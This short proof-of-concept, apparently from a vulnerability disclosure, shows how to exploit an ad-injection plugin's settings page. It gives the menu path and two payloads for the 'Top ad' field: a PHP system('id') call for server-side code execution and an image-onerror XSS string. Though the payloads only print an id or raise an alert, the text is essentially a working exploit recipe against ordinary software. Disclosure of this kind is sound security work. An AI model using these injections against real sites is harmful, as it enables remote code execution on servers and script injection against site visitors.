Proof of Concept
- On the left colum go to Settings > Ad Injection.
- In the section Adverts: Top ad (below post title - this is not a 'header' ad) use the following payload:
<?php system('id'); ?>
Alternatively for XSS:
<img src onerror=alert(/XSS/)>